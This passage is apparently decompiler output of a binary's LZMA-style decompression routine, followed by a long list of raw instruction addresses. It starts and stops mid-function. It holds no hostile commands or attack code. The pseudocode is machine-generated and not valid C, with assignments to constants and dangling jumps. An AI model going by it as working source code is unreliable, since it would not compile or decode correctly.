												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                  0x00406609
                                                  0x00406609
                                                  0x00406609
                                                  0x00406609
                                                  0x0040660f
                                                  0x00406613
                                                  0x00406617
                                                  0x00406621
                                                  0x0040662f
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x00000000
                                                  0x00000000
                                                  0x00406942
                                                  0x0040694b
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406999
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x00406940
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040699b
                                                  0x0040699b
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00406a50
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x0040691e
                                                  0x00406924
                                                  0x0040692b
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00000000
                                                  0x00406936
                                                  0x004069a0
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406067
                                                  0x00000000
                                                  0x0040606e
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x00406078
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d3
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x0040611d
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x00406147
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x0040618d
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x0040689b
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
